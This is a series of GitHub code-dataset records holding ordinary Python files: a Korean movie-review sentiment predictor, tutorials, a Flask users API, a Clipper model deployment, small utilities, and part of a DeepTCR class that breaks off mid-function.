RNA/Transcribing_DNA_into_RNA.py","file_name":"Transcribing_DNA_into_RNA.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4766258992","text":"import joblib, re\nfrom konlpy.tag import Okt as okt\nimport konlpy\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\n#from NaverMovie import execute\nfrom functools import reduce\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nfrom collections import Counter as counter\n#from kakaoMessage import execute_msg\n\n# 영화 예측 -> 0 : 부정 / 1 : 긍정\n# 이 메서드 없으면 벡터라이저 파일을 업로드 못함! \n# 장고에서는 manage.py에다가 넣어주어야 함!\ndef divide_morphs(txt):\n nlp = okt()\n return nlp.morphs(txt)\n\ndef pre_ready(text, tfidfVec):\n temp = text\n temp = re.compile(r'[ㄱ-ㅣ가-힣]+').findall(temp)\n temp = [' '.join(temp)]\n return tfidfVec.transform(temp)\n\ndef draw_wc(worddict):\n font_path = './resources/font/ibmplexsanskr_regular.ttf'\n wc = WordCloud(font_path, background_color='beige', width=700, height=500)\n c = wc.generate_from_frequencies(worddict)\n c.to_file('./static/img/result_wordcloud.jpg')\n #plt.figure(figsize=(8, 8))\n #plt.imshow(c)\n #plt.axis('off')\n #plt.show()\n\ndef entire_predict(ratingStar, result_data):\n # gridSearch version : 미리 훈련된 모델과 벡터라이저를 가져옵니다.\n model = joblib.load('./resources/model/rand/best_review_classifier.pkl')\n tfidfVec = joblib.load('./resources/model/rand/tfidfVectorizer_rand.pkl')\n\n # 영화 제목을 검색하여 원하는 영화를 선택한 후, 그 영화에서 원하는 만큼의 리뷰 데이터를 가져옵니다.\n #ratingStar, result_data = execute()\n result_data = result_data[1][1:]\n\n print('\\n\\n분석이 끝날 때까지 잠시만 기다려주세요......')\n pos = []\n neg = []\n posCount = 0\n negCount = 0\n entire = len(result_data)\n\n for i in result_data:\n ready = pre_ready(i, tfidfVec)\n res = model.predict(ready)\n if res == 0: # 0은 부정\n neg.append(i)\n negCount += 1\n else:\n pos.append(i)\n posCount += 1\n\n collect = ''\n tree = ''\n resStr = ''\n print('='*50, '결과', '='*50, end='\\n\\n')\n plt.figure(figsize=(8, 8))\n posPercent = (posCount/entire) * 100\n tree = '긍정적인 의견 : {}% / 부정적인 의견 : {}%'.format(posPercent, 100-posPercent)\n print(tree)\n if 0 <= posPercent < 25:\n resStr += '노잼!\\n으헝헝 노잼! 이걸 보느니 차라리 아무것도 안하고 말지...!!!!'\n #render = img.imread('./resources/imgs/jo.jpg')\n elif 25 <= posPercent < 75:\n resStr += '볼까? 말까?\\n'\n #render = img.imread('./resources/imgs/gomin.png')\n if 25 <= posPercent < 50:\n resStr += '관람객의 의견은 {} 부정적인 편입니다.....'.format('대체로' if 25 <= posPercent < 35 else '')\n else:\n resStr += '관람객의 의견은 {} 긍정적인 편입니다~'.format('대체로' if 65 <= posPercent < 75 else '')\n elif 75<= posPercent <= 100:\n #render = img.imread('./resources/imgs/wow.jpg')\n resStr += '어머! 이건 꼭 사야 해!\\n꼭 보세요! 무조건 보세요!'\n print(resStr)\n # plt.imshow(render)\n #plt.axis('off')\n #plt.show()\n #print('\\n')\n collect += resStr + '\\n\\n' + tree + '\\n\\n' \n\n if 0 <= posPercent < 50:\n longline = reduce(lambda x, y : x + ' ' + y, neg)\n else:\n longline = reduce(lambda x, y : x + ' ' + y, pos)\n longline = re.sub('[^가-힣ㄱ-ㅎㅏ-ㅣ]', ' ', longline)\n nlp = okt()\n nouns = nlp.nouns(longline)\n\n vcount = counter(nouns)\n worddict = dict()\n mc100 = vcount.most_common(100)\n for group in mc100:\n if group[1] > 2:\n worddict[group[0]] = group[1]\n\n starStr = ''\n #print('이 영화를 시청한 사람들의 평점입니다.')\n for star in ratingStar: starStr += star\n #print('관람객들의 리뷰에 가장 많이 등장한 단어들입니다.')\n print(starStr)\n draw_wc(worddict)\n collect += starStr\n return [posCount, posPercent, ratingStar, collect]\n","repo_name":"Daniel-David-Kim/How_about_this_movie","sub_path":"Personal/nmovie/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5872747454","text":"print(\"****Garbage Collection*****\")\r\n#How to enable and disable Garbage Collector in our Program :\r\n\"\"\"1) gc.isenabled()  Returns True if GC enabled\r\n 2) gc.disable() To disable GC explicitly\r\n 3) gc.enable() To enable GC explicitly \"\"\"\r\n\r\nimport gc\r\nprint(gc.isenabled())\r\ngc.disable()\r\nprint(gc.isenabled())\r\ngc.enable()\r\nprint(gc.isenabled())\r\n\r\nprint(\"*****Destructors*****\")\r\n\"\"\"Destructor is a special method and the name should be __del__\r\n--> Just before destroying an object Garbage Collector always calls destructor to perform\r\nclean up activities (Resource deallocation activities like close database connection etc).\r\n--->Once destructor execution completed then Garbage Collector automatically destroys\r\nthat object. \"\"\"\r\n\r\nimport time\r\nclass Test:\r\n def __init__(self):\r\n print(\"Object Initialization...\")\r\n def __del__(self):\r\n print(\"Fulfilling Last Wish and performing clean up activities...\")\r\nt1=Test()\r\nt1=None\r\ntime.sleep(5)\r\nprint(\"End of application\")\r\n\r\n\r\nprint(\"****find the Number of References of an Object****\")\r\n\"\"\"sys module contains getrefcount() function for this purpose.\r\nsys.getrefcount (objectreference) \"\"\"\r\nimport sys\r\nclass Sample:\r\n pass\r\ns1=Sample()\r\ns2=s1\r\ns3=s1\r\ns4=s1\r\ns5=s1\r\nprint(sys.getrefcount(s1))\r\n","repo_name":"VenkyGajula/Python_Advance_OOPS","sub_path":"GBC.py","file_name":"GBC.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6392692130","text":"import datetime\n\nfrom bot.data.schedule.couple_constants import FIRTS_START, SECOND_START, THIRD_START, FOURTH_START, FIFTH_START\nfrom bot.data.schedule.couple_constants import FIRST_END, SECOND_END, THIRD_END, FOURTH_END, FIFTH_END\n\n\ndef event_remains(number_of_couple: int, event_status: str) -> str:\n \"\"\"Считает, сколько оcталось до конца соответствующей пары или перемны\"\"\"\n\n if event_status == 'lesson':\n event = {0: FIRST_END, 1: SECOND_END, 2: THIRD_END, 3: FOURTH_END, 4: FIFTH_END}\n else:\n event = {0: FIRTS_START, 1: SECOND_START, 2: THIRD_START, 3: FOURTH_START, 4: FIFTH_START}\n\n now = datetime.datetime.now()\n\n delta = str(datetime.datetime.combine(datetime.datetime.today(), event[number_of_couple]) - now)\n\n return delta[:-7]\n","repo_name":"daniilolider/lupen","sub_path":"bot/modules/schedule/event_remains.py","file_name":"event_remains.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30837160601","text":"import re\r\nimport time\r\n\r\n\r\nclass DatePipeline:\r\n def process_item(self, item, spider):\r\n date = item['confrontation_date']\r\n date = self.trunc_day_name(date)\r\n date = self.replace_month_name_by_number(date)\r\n date = self.get_time_object(date)\r\n item['confrontation_date'] = date\r\n return item\r\n\r\n def trunc_day_name(self, date):\r\n pattern = r\"(\\d.*)$\"\r\n match = re.search(pattern, date)\r\n return match.group(0)\r\n\r\n def replace_month_name_by_number(self, date):\r\n months = {\r\n 'janvier': '01',\r\n 'février': '02',\r\n 'mars': '03',\r\n 'avril': '04',\r\n 'mai': '05',\r\n 'juin': '06',\r\n 'juillet': '07',\r\n 'août': '08',\r\n 'septembre': '09',\r\n 'octobre': '10',\r\n 'novembre': '11',\r\n 'décembre': '12',\r\n }\r\n\r\n for month_name, month_number in months.items():\r\n date = date.replace(month_name, month_number)\r\n \r\n return date\r\n\r\n def get_time_object(self, date):\r\n if re.search(r'^\\d+\\s+\\d+\\s+\\d+$', date):\r\n # sometimes, the hour is not indicated\r\n return time.strptime(date, \"%d %m %Y\")\r\n return time.strptime(date, \"%d %m %Y - %HH%M\")","repo_name":"Surkal/FFF-data-extractor","sub_path":"extractor/extractor/pipelines/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3082267881","text":"import torch\nimport torchvision\nimport numpy as np\nimport os\nimport io\nimport base64\nimport requests\nimport json\nimport time\nimport pyarrow as pa\nfrom PIL import Image\nfrom torchvision import transforms\nfrom clipper_admin import ClipperConnection, DockerContainerManager\nimport clipper_admin.deployers.pytorch as pytorch_deployer\nfrom clipper_admin.deployers import python as python_deployer\nfrom clipper_admin.deployers.python import deploy_python_closure\n\n\nincept = torchvision.models.inception_v3(pretrained=True)\ntransform_pipeline = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize(299),\n transforms.CenterCrop(299),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n])\n\ndef incept_predict(model, inputs):\n model.eval()\n x = [pa.deserialize(i) for i in inputs]\n input_tensor = torch.cat([transform_pipeline(i[0]).unsqueeze(0) for i in x])\n \n \n with torch.no_grad():\n out = model(input_tensor)\n \n _, indices = torch.sort(out, descending=True)\n percentage = torch.nn.functional.softmax(out, dim=1)\n p_2 = percentage.detach().numpy()\n return [[indices.data.numpy()[idx][0].item(), p_2[idx][indices[idx][0]].item()*100] for idx in range(len(inputs))]\n\n\n\ndef setup_clipper():\n app_name = 'inceptionv3-app'\n model_name = 'inceptionv3-model'\n clipper_conn = ClipperConnection(DockerContainerManager())\n clipper_conn.connect()\n\n pytorch_deployer.deploy_pytorch_model(clipper_conn=clipper_conn,\n name=model_name,\n version='1',\n input_type='bytes',\n func=incept_predict,\n pytorch_model=incept,\n num_replicas=10,\n batch_size = 1,\n pkgs_to_install=['pillow','pyarrow', 'torch', 'torchvision'])\n\n clipper_conn.register_application(name=app_name,\n input_type=\"bytes\",\n default_output=\"-1.0\",\n slo_micros=10000000) # 10s\n\n clipper_conn.link_model_to_app(app_name=app_name, model_name=model_name)\n\n\n print(\"url: \", \"http://{addr}/{app_name}/predict\".format(addr=\"\",app_name=app_name))\n\n\nsetup_clipper()","repo_name":"hsubbaraj/clipper_bench","sub_path":"incept_setup.py","file_name":"incept_setup.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20383328328","text":"# -- DICTIONARIES --\n# Connect pieces of related info\n# dictionaries == objects == hashes\n\nalien_0 = {'color': 'green', 'planet': 'zion'}\n# print(alien_0['color']) //=> green\n\n# Keys are kept in the same order they're added\nalien_0['x_pos'] = 0\nalien_0['y_pos'] = 25\n\n# Overwriting values\nalien_0['color'] = 'purple'\n\n# Delete key/value\ndel alien_0['planet']\n\n# Get method\n# Optional - set default return, or returns NONE\n# DOESN'T SET DEFAULT VALUE!!\n# print(alien_0.get('name', 'Blinky'))\n\n# -- Looping through dictionaries --\n# \t1) for key, value in alien_0\n# \t2) for key in alien_0.keys()\n# \t3) for key in alien_0 - Same as above!\n# \t4) for value in alien_0.values()\n\n# set() makes list unique!\n\nlist_of_ranges = []\nfor value in range(6):\n\tnew_dict = {'range': value}\n\tlist_of_ranges.append(new_dict)\n# print(list_of_ranges[3]['range']) // => 3\n\n\n# -- Nested data structures --\ncomplex_dict = {\n\t'first': {\n\t\t'name': 'Christian',\n\t\t'age': 25,\n\t\t'hobbies': ['cooking', 'skating', 'hiking']\n\t}\n}\n\n# print(complex_dict['first']['hobbies'][2]) // => 'hiking'","repo_name":"SenseiCain/python_crash_course","sub_path":"syntax/dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7829332469","text":"import json\r\n\r\n\r\nclass RequestAssembler:\r\n '''\r\n Request assembler\r\n '''\r\n\r\n @staticmethod\r\n def assembleConnectRequest():\r\n request = dict()\r\n request['head'] = 'connectRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleGetFileListFromServerRequest():\r\n request = dict()\r\n request['head'] = 'getFileListFromServerRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleNewFileRequest(fileName, content):\r\n request = dict()\r\n request['head'] = 'newFileRequest'\r\n request['fileName'] = fileName\r\n request['content'] = content\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleJoinNetworkRequest(nodeId, nodeIp, nodePort):\r\n request = dict()\r\n request['head'] = 'joinNetworkRequest'\r\n request['nodeId'] = nodeId\r\n request['nodeIp'] = nodeIp\r\n request['nodePort'] = nodePort\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleAddFileRequest(fileName, content, forward):\r\n request = dict()\r\n request['head'] = 'addFileRequest'\r\n request['fileName'] = fileName\r\n request['content'] = content\r\n request['forward'] = forward\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleReadFileRequest(fileName):\r\n request = dict()\r\n request['head'] = 'readFileRequest'\r\n request['fileName'] = fileName\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleGetFileListFromNodeRequest():\r\n request = dict()\r\n request['head'] = 'getFileListFromNodeRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleCloneNodeRequest():\r\n request = dict()\r\n request['head'] = 'cloneNodeRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleCopyServerRequest(nodeList, fileList, backupServerList):\r\n request = dict()\r\n request['head'] = 'copyServerRequest'\r\n request['nodeList'] = nodeList\r\n request['fileList'] = fileList\r\n request['backupServerList'] = backupServerList\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleCloneServerRequest(serverId):\r\n request = dict()\r\n request['head'] = 'cloneServerRequest'\r\n request['serverId'] = serverId\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleJoinBackupListRequest(serverId, serverIp, serverPort):\r\n request = dict()\r\n request['head'] = 'joinBackupListRequest'\r\n request['serverId'] = serverId\r\n request['serverIp'] = serverIp\r\n request['serverPort'] = serverPort\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleGetBackupServerRequest():\r\n request = dict()\r\n request['head'] = 'getBackupServerRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleStorageNodeRemoveRequest(nodeId):\r\n request = dict()\r\n request['head'] = 'storageNodeRemoveRequest'\r\n request['nodeId'] = nodeId\r\n return json.dumps(request)\r\n","repo_name":"Zhuolun1996/CS2510Project2","sub_path":"MessageAssembler/RequestAssembler.py","file_name":"RequestAssembler.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44116958918","text":"#!/usr/bin/python3\n\"\"\"API Routes for Users.\n\nThis module defines the API routes for handling users in the Flask app.\nIt includes route handlers for retrieving all users,\nretrieving a specific user by ID, creating a new user,\nupdating an existing user, and deleting a user.\n\nRoutes:\n- GET /users: Retrieve all users.\n- GET /users/: Retrieve a specific user by ID.\n- DELETE /users/: Delete a user.\n- POST /users/: Create a new user.\n- PUT /users/: Update an existing user.\n\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, request\nfrom models import storage\nfrom models.engine.db_storage import classes\n\n\n@app_views.route(\"/users\", strict_slashes=False, methods=[\"GET\"])\ndef get_users():\n \"\"\"Retrieve all users.\n\n Returns:\n A JSON response containing a list of all users.\n \"\"\"\n users = storage.all(\"User\")\n users_list = []\n for user in users.values():\n users_list.append(user.to_dict())\n return jsonify(users_list)\n\n\n@app_views.route(\"/users/\", strict_slashes=False, methods=[\"GET\"])\ndef get_user(user_id):\n \"\"\"Retrieve a specific user by ID.\n\n Args:\n user_id: The ID of the user to retrieve.\n\n Returns:\n A JSON response containing the details of the specified user.\n\n Raises:\n 404: If the user with the specified ID does not exist.\n \"\"\"\n user = storage.get(classes[\"User\"], user_id)\n if user is None:\n abort(404)\n return jsonify(user.to_dict())\n\n\n@app_views.route(\"/users/\", strict_slashes=False, methods=[\"DELETE\"])\ndef delete_user(user_id):\n \"\"\"Delete a user.\n\n Args:\n user_id: The ID of the user to delete.\n\n Returns:\n An empty JSON response.\n\n Raises:\n 404: If the user with the specified ID does not exist.\n \"\"\"\n user = storage.get(classes[\"User\"], user_id)\n if user is None:\n abort(404)\n storage.delete(user)\n storage.save()\n return jsonify({})\n\n\n@app_views.route(\"/users/\", strict_slashes=False, methods=[\"POST\"])\ndef post_user():\n \"\"\"Create a new user.\n\n Returns:\n A JSON response containing the details of the newly created user.\n\n Raises:\n 400: If the request data is not a valid JSON\n or if the 'email' or 'password' field is missing.\n \"\"\"\n user_data = request.get_json(force=True, silent=True)\n if type(user_data) is not dict:\n abort(400, \"Not a JSON\")\n\n if \"email\" not in user_data:\n abort(400, \"Missing email\")\n\n if \"password\" not in user_data:\n abort(400, \"Missing password\")\n else:\n new_user = classes[\"User\"](**user_data)\n storage.new(new_user)\n storage.save()\n return jsonify(new_user.to_dict()), 201\n\n\n@app_views.route(\"/users/\", strict_slashes=False, methods=[\"PUT\"])\ndef put_user(user_id):\n \"\"\"Update an existing user.\n\n Args:\n user_id: The ID of the user to update.\n\n Returns:\n A JSON response containing the updated details of the user.\n\n Raises:\n 404: If the user with the specified ID does not exist.\n 400: If the request data is not a valid JSON.\n \"\"\"\n user = storage.get(classes[\"User\"], user_id)\n if user is None:\n abort(404)\n\n user_data = request.get_json(force=True, silent=True)\n if type(user_data) is not dict:\n abort(400, \"Not a JSON\")\n\n for key, value in user_data.items():\n if key in [\"id\", \"email\", \"created_at\", \"updated_at\"]:\n continue\n setattr(user, key, value)\n\n storage.save()\n return jsonify(user.to_dict())\n","repo_name":"PeterDalatu/AirBnB_clone_v3","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2449238253","text":"from random import randint\r\nfrom time import sleep\r\n\r\nn1 = randint(0,5)\r\n\r\nprint('O computador pensou em um número de 0 a 5.')\r\nn2 = int(input('Adivinhe qual é o número: '))\r\nprint('.')\r\nsleep(1)\r\nprint('.')\r\nsleep(1)\r\nprint('.')\r\nsleep(1)\r\n\r\nif n2 == n1:\r\n print('Você acertou! {}'.format(n1))\r\nelse:\r\n print('Errou. Resposta: {}'.format(n1))","repo_name":"jvjzn/PythonExercicios","sub_path":"ex031-adivinha.py","file_name":"ex031-adivinha.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39605516987","text":"from copy import deepcopy\nfrom typing import Callable\nfrom random import randint, choices\nfrom pathlib import Path\n\nimport csv\n\ntry:\n from roots_x_pow2 import roots\n from csv_to_json import json_converter, OUT\nexcept ImportError:\n from .roots_x_pow2 import roots\n from .csv_to_json import json_converter, OUT\n\nFILENAME = Path(\"rand_ints.csv\")\nREPETITIONS = randint(100, 1000)\nHEADERS = (\"a\", \"b\", \"c\")\n\n\ndef wr_roots(func: Callable):\n def wrapper(*args, **kwargs):\n \"\"\"нахуя? нахуя? нахуя?\"\"\"\n temp = next(iter(func(args[0])))\n a, b, c = temp.values()\n temp.update({\"out\": roots(a, b, c)})\n return temp\n\n return wrapper\n\n\ndef repeat(n: int):\n def repeat_deco(func: Callable):\n def wrapper(*args, **kwargs):\n nonlocal n\n out: list[dict[str, int]] = []\n for i in range(n):\n out.append(\n func(args[0])\n )\n return out\n\n return wrapper\n\n return repeat_deco\n\n\ndef to_csv(name: Path):\n global HEADERS\n\n def dump(func: Callable):\n def wrapper(*args, **kwargs):\n nonlocal name\n temp = func(args[0])\n\n with open(name, mode=\"wt\", encoding=\"utf-8\") as core:\n blank = csv.DictWriter(f=core, dialect=\"excel\", fieldnames=HEADERS)\n blank.writeheader()\n for line in temp:\n tmp = deepcopy(line)\n tmp.pop(\"out\")\n blank.writerow(tmp)\n return temp\n\n return wrapper\n\n return dump\n\n\n@json_converter(OUT)\n@to_csv(FILENAME)\n@repeat(REPETITIONS)\n@wr_roots\ndef worker(*args):\n less_m = abs(args[0]) if args[0] else 100\n while True:\n yield {\n HEADERS[0]: randint(0, less_m),\n HEADERS[1]: randint(0, less_m),\n HEADERS[2]: randint(0, less_m)\n }\n\n\nif __name__ == '__main__':\n worker()\n","repo_name":"am1bestofluck/python_insight","sub_path":"dz9/content/int_spam.py","file_name":"int_spam.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39166912484","text":"import sys\n\nsys.path.append('../')\nfrom functions.Layers import *\nfrom functions.data_processing import *\nfrom functions.utils_s import *\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport glob\nimport seaborn as sns\nimport umap.umap_ as umap\nimport warnings\nimport shutil\nfrom multiprocessing.pool import Pool \nfrom scipy.spatial.distance import pdist, squareform\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\n\nclass DeepTCR_base(object):\n\n def __init__(self,Name,max_length=40,device=0,tf_verbosity=3):\n \"\"\"\n # Initialize Training Object.\n Initializes object and sets initial parameters.\n All DeepTCR algorithms begin with initializing a training object. This object will contain all methods, data, and results during the training process. One can extract learned features, per-sequence predictions, among other outputs from DeepTCR and use those in their own analyses as well.\n Args:\n Name (str): Name of the object. This name will be used to create folders with results as well as a folder with parameters and specifications for any models built/trained.\n max_length (int): maximum length of CDR3 sequence.\n device (int): In the case user is using tensorflow-gpu, one can specify the particular device to build the graphs on. This selects which GPU the user wants to put the graph and train on.\n tf_verbosity (str): determines how much tensorflow log output to display while training.\n 0 = all messages are logged (default behavior)\n 1 = INFO messages are not printed\n 2 = INFO and WARNING messages are not printed\n 3 = INFO, WARNING, and ERROR messages are not printed\n \"\"\"\n\n #Assign parameters\n self.Name = Name\n self.max_length = max_length\n self.use_beta = False\n self.use_alpha = False\n self.device = '/device:GPU:'+str(device)\n self.use_v_beta = False\n self.use_d_beta = False\n self.use_j_beta = False\n self.use_v_alpha = False\n self.use_j_alpha = False\n self.use_rna = False\n self.regression = False\n self.unknown_str = '__unknown__'\n\n #Create dataframes for assigning AA to ints\n aa_idx, aa_mat = make_aa_df()\n aa_idx_inv = {v: k for k, v in aa_idx.items()}\n self.aa_idx = aa_idx\n self.aa_idx_inv = aa_idx_inv\n\n #Create directory for results of analysis\n directory = os.path.join(self.Name,'results')\n self.directory_results = directory\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n #Create directory for any temporary files\n directory = self.Name\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n tf.compat.v1.disable_eager_execution()\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(tf_verbosity)\n\n def Get_Data(self,directory,file_rna,classes=None, n_jobs=40,\n aa_column_alpha = None,aa_column_beta = None, count_column = None,sep='\\t',aggregate_by_aa=True,\n v_alpha_column=None,j_alpha_column=None,\n v_beta_column=None,j_beta_column=None,d_beta_column=None, p=None):\n \"\"\"\n # Get Data for DeepTCR\n Parse Data into appropriate inputs for neural network from directories where data is stored.\n This method can be used when your data is stored in directories and you want to load it from directoreis into DeepTCR. This method takes care of all pre-processing of the data including:\n - Combining all CDR3 sequences with the same nucleotide sequence (optional).\n - Removing any sequences with non-IUPAC characters.\n - Removing any sequences that are longer than the max_length set when initializing the training object.\n - Determining how much of the data per file to use (type_of_data_cut)\n Args:\n directory (str): Path to directory with folders with tsv/csv files are present for analysis. Folders names become labels for files within them. If the directory contains the TCRSeq files not organized into classes/labels, DeepTCR will load all files within that directory.\n file_rna (str): Path to scRNA-seq file. Rows are cells, and columns are genes.\n classes (list): Optional selection of input of which sub-directories to use for analysis.\n type_of_data_cut (str): Method by which one wants to sample from the TCRSeq File.\n ###\n Options are:\n - Fraction_Response: A fraction (0 - 1) that samples the top fraction of the file by reads. For example, if one wants to sample the top 25% of reads, one would use this threshold with a data_cut = 0.25. The idea of this sampling is akin to sampling a fraction of cells from the file.\n - Frequency_Cut: If one wants to select clones above a given frequency threshold, one would use this threshold. For example, if one wanted to only use clones about 1%, one would enter a data_cut value of 0.01.\n - Num_Seq: If one wants to take the top N number of clones, one would use this threshold. For example, if one wanted to select the top 10 amino acid clones from each file, they would enter a data_cut value of 10.\n - Read_Cut: If one wants to take amino acid clones with at least a certain number of reads, one would use this threshold. For example, if one wanted to only use clones with at least 10 reads,they would enter a data_cut value of 10.\n - Read_Sum: IF one wants to take a given number of reads from each file, one would use this threshold. For example, if one wants to use the sequences comprising the top 100 reads of hte file, they would enter a data_cut value of 100.\n data_cut (float or int): Value associated with type_of_data_cut parameter.\n n_jobs (int): Number of processes to use for parallelized operations.\n aa_column_alpha (int): Column where alpha chain amino acid data is stored. (0-indexed).\n aa_column_beta (int): Column where beta chain amino acid data is stored.(0-indexed)\n count_column (int): Column where counts are stored.\n sep (str): Type of delimiter used in file with TCRSeq data.\n aggregate_by_aa (bool): Choose to aggregate sequences by unique amino-acid. Defaults to True. If set to False, will allow duplicates of the same amino acid sequence given it comes from different nucleotide clones.\n v_alpha_column (int): Column where v_alpha gene information is stored.\n j_alpha_column (int): Column where j_alpha gene information is stored.\n v_beta_column (int): Column where v_beta gene information is stored.\n d_beta_column (int): Column where d_beta gene information is stored.\n j_beta_column (int): Column where j_beta gene information is stored.\n p (multiprocessing pool object): For parellelized operations, one can pass a multiprocessing pool object to this method.\n Returns:\n variables into training object\n - self.alpha_sequences (ndarray): array with alpha sequences (if provided)\n - self.beta_sequences (ndarray): array with beta sequences (if provided)\n - self.class_id (ndarray): array with sequence class labels\n - self.sample_id (ndarray): array with sequence file labels\n - self.freq (ndarray): array with sequence frequencies from samples\n - self.counts (ndarray): array with sequence counts from samples\n - self.(v/d/j)_(alpha/beta) (ndarray): array with sequence (v/d/j)-(alpha/beta) usage\n \"\"\"\n\n if aa_column_alpha is not None:\n self.use_alpha = True\n\n if aa_column_beta is not None:\n self.use_beta = True\n\n if v_alpha_column is not None:\n self.use_v_alpha = True\n\n if j_alpha_column is not None:\n self.use_j_alpha = True\n\n if v_beta_column is not None:\n self.use_v_beta = True\n\n if d_beta_column is not None:\n self.use_d_beta = True\n\n if j_beta_column is not None:\n self.use_j_beta = True\n\n\n #Determine classes based on directory names\n data_in_dirs = True\n if classes is None:\n classes = [d for d in os.listdir(directory) if os.path.isdir(os.path.join(directory,d))]\n classes = [f for f in classes if not f.startswith('.')]\n if not classes:\n classes = ['None']\n data_in_dirs = False\n\n self.lb = LabelEncoder()\n self.lb.fit(classes)\n self.classes = self.lb.classes_\n\n if p is None:\n p_ = Pool(n_jobs)\n else:\n p_ = p\n \n if sep == '\\t':\n ext = '*.tsv'\n elif sep == ',':\n ext = '*.csv'\n else:\n print('Not Valid Delimiter')\n return\n\n #Get data from tcr-seq files\n alpha_sequences = []\n beta_sequences = []\n v_beta = []\n d_beta = []\n j_beta = []\n v_alpha = []\n j_alpha = []\n label_id = []\n file_id = []\n freq = []\n counts=[]\n file_list = []\n seq_index = []\n print('Loading Data...')\n for type in self.classes:\n if data_in_dirs:\n files_read = glob.glob(os.path.join(directory, type, ext))\n else:\n files_read = glob.glob(os.path.join(directory,ext))\n num_ins = len(files_read)\n args = list(zip(files_read,\n [aa_column_alpha] * num_ins,\n [aa_column_beta] * num_ins,\n [count_column] * num_ins,\n [sep] * num_ins,\n [self.max_length]*num_ins,\n [aggregate_by_aa]*num_ins,\n [v_beta_column]*num_ins,\n [d_beta_column]*num_ins,\n [j_beta_column]*num_ins,\n [v_alpha_column]*num_ins,\n [j_alpha_column]*num_ins))\n\n DF = p_.starmap(Get_DF_Data, args)\n\n DF_temp = []\n files_read_temp = []\n for df,file in zip(DF,files_read):\n if df.empty is False:\n DF_temp.append(df)\n files_read_temp.append(file)\n\n DF = DF_temp\n files_read = files_read_temp\n\n for df, file in zip(DF, files_read):\n if aa_column_alpha is not None:\n alpha_sequences += df['alpha'].tolist()\n if aa_column_beta is not None:\n beta_sequences += df['beta'].tolist()\n\n if v_alpha_column is not None:\n v_alpha += df['v_alpha'].tolist()\n\n if j_alpha_column is not None:\n j_alpha += df['j_alpha'].tolist()\n\n if v_beta_column is not None:\n v_beta += df['v_beta'].tolist()\n\n if d_beta_column is not None:\n d_beta += df['d_beta'].tolist()\n\n if j_beta_column is not None:\n j_beta += df['j_beta'].tolist()\n\n label_id += [type] * len(df)\n file_id += [file.split('/')[-1]] * len(df)\n file_list.append(file.split('/')[-1])\n freq += df['Frequency'].tolist()\n counts += df['counts'].tolist()\n seq_index += df.index.tolist()\n\n alpha_sequences = np.asarray(alpha_sequences)\n beta_sequences = np.asarray(beta_sequences)\n v_beta = np.asarray(v_beta)\n d_beta = np.asarray(d_beta)\n j_beta = np.asarray(j_beta)\n v_alpha = np.asarray(v_alpha)\n j_alpha = np.asarray(j_alpha)\n label_id = np.asarray(label_id)\n file_id = np.asarray(file_id)\n freq = np.asarray(freq)\n counts = np.asarray(counts)\n seq_index = np.asarray(seq_index)\n\n Y = self.lb.transform(label_id)\n OH = OneHotEncoder(sparse=False,categories='auto')\n Y = OH.fit_transform(Y.reshape(-1,1))\n\n print('Embedding Sequences...')\n #transform sequences into numerical space\n if aa_column_alpha is not None:\n args = list(zip(alpha_sequences, [self.aa_idx] * len(alpha_sequences), [self.max_length] * len(alpha_sequences)))\n result = p_.starmap(Embed_Seq_Num, args)\n sequences_num = np.vstack(result)\n 